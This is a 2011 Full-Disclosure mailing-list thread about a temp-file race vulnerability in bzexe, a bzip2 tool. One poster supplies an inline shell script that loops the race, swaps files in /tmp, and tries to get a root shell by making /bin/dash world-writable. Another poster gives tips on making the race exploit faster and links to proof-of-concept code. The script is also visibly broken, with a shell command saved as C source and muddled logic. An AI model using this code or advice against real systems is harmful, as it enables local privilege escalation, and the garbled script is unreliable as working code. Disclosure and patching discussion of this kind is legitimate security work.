Date: Mon, 7 Nov 2011 09:33:58 +1100
From: xD 0x41 <secn3t@...il.com>
To: vladz <vladz@...zero.fr>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Symlink vulnerabilities

Nice :)
I have put a post about this whole thread on www.crazycoders.com ,
will add this and props for those involved now :)
thx to you, bugs and for others who were involved, also realise that i
have now found that bzexe = bzip2 src code, so looking on
debian/ubuntu and centos, there is a bzexe or bzip2 on every box,...
luckily this issue is patched for both bzip2 and bzexe but know that
it is even still being tested now against bunzip2 , on decompressions,
but has not been done, only know that the src is same as bzip2
executable binary (linux), again, thx to everyone involved, it got
patched within a day wich is what was the aim... Ubuntu is alittle
safer ;s
cheers.
xd


On 7 November 2011 03:54, vladz <vladz@...zero.fr> wrote:
>
> Hi!
>
> It's raining here, so I finally wrote a PoC for the bzexe issue:
>
>  http://vladz.devzero.fr/other/bzexe_PoC.c.html
>
> It always succeed on my Dual-core.
>
> Cheers,
> vladz.
>
>
> On Fri, Oct 28, 2011 at 11:43:56AM +1100, xD 0x41 wrote:
>> I just did a quick write of it , i think this is right anyhow.. i aint
>> the greatest of bash/exploit coders in bash but i did try, and, i
>> kinda had it almost same, but for one line, the while.. i guess that
>> does it, well. here is an example i guess, if we wee to use gcc and
>> make a binary called 'bad' properly.. i assume this would be the
>> way... 8
>>
>>
>> #!/bin/sh
>> cd /tmp
>> cat > /tmp/bad.c << EOF
>> chmod 777 /bin/dash
>> EOF
>> gcc /tmp/bad.c -o /tmp/bad
>> while (true) do ./bz.sh ; done
>> #!/bin/bash
>> if [ -a /tmp/bash/gztmp* ]
>> then
>> echo "[+] Exploting .."
>> mv /tmp/bash /tmp/bash.dir
>> cp /tmp/bad /tmp/dash
>> echo "[!] Got dash rootshell in: /tmp/dash .."
>> ./dash
>> ls -l /tmp/dash
>> while (true) do ./bz.sh ; done
>> whoami
>> id
>> su
>> fi
>>
>> I think this would be kinda close ?
>> I dont expect this togo onto public domain ATALL, so please, Ill
>> respect your privacy but, you also respect mine ok :)
>> I like you, your a great guy, and, awesome for taking the challenge,
>> where even the striongest, like taviso, and kcope even, left in your
>> wake... and even i am abit shocked but, am going to try and, put it
>> into practice,... the .c bzexe doesnt really do it for me :P but yes,
>> i did change it alittle so it atleast echoes across a tmp bin/sh or,
>> so i think it needs.. then again, it might not need anything, ut, i
>> know these pocs wont get people a rootshell unless we show them, so, i
>> guess aslong as these kinda emails stay pvt, its all good.
>> i have alot fo bugs in the bash area, and i discuss alot with some
>> members of the list even ojn my irc channel on efnet #haxnet , and,
>> there is ALL the exploit coders from FD probably, phrack and more
>> gropups,core,kcope,and rapid7,all them other smaller secteams seem to
>> lurk also, from a 3 user channel about 1 year ago, simply speaking
>> about PoCs made and theyre worth.
>> I guess it is good to see and then to prioritise, as debian have done
>> now, with the bzexe :)
>> See, it would have probably rmained nothing done for god knows, if you
>> had not taken the challenge up, and, i cant believe you did it with a
>> shitty 500mhz! LOL, i am loooking at about 4 of those atm on my floor,
>> i did a tradein offer, p3 for p4 for 50bux, and , i was after that
>> exact celeron and pentium 500mhz p3 cores, theyre very good when
>> played with and, my gears all rack.
>> Anyhow, i would love to chat with you, you use irc >?
>> if so, id love to catchup and have a chat anytime :)
>> If your in Australia, well heck come over for a coffee buddy!
>> have a greeat day, and, if you can fix this to make a rootshell, well,
>> it shuld make it anyhow but, just incase, i guess this is my own
>> collection, and, i have like 6 sh files, wich between them, get all
>> 2011 and earlier, and it is really scary because, there is NO way to
>> expoit them , if using .c ... Anyhow, thankyou, very much, and, i and
>> the secworld owe you a big thanks :)
>> I only wish they credited ppl like me, who try to inpire...lol, i
>> guess i am like one of those dodgy football managers who sleeps with
>> pros and swtuff... hehe... kept in the back... for ther sake of
>> sanity.
>> lol... hjave a good one mate!
>> xd / crazycoders.com ( i will soon make an article and a compete patch
>> solution etc, when it has a patch availabale, ofcourse then
>>
>> PS: i will post it in one big PoC details with solution and patch
>> attached to the posting etc...i dont like to pulish things wich are
>> not atleast being patched.... so, i guess, enjoy!
>>
>>
>>
>>
>>
>> On 28 October 2011 04:34, vladz <vladz@...zero.fr> wrote:
>> >
>> >
>> > On Thu, Oct 27, 2011 at 05:01:30PM +0200, Benjamin Renaut wrote:
>> >> http://pastebin.com/FaaEsXRW
>> >
>> > Nice thing, but for sure, it can be optimized.
>> >
>> > For example, to save time, I would suggest you to use rename() instead
>> > of using both unlink() and rmdir() functions.  Same thing for your
>> > write_shellcode() function, it contains too much calls.  It would be
>> > preferable to create your nasty shell script first, and then (when it's
>> > time), rename() it as dirname.
>> >
>> > Cheers,
>> > --
>> > http://vladz.devzero.fr
>> > PGP key 8F7E2D3C from pgp.mit.edu
>> >
>> > _______________________________________________
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists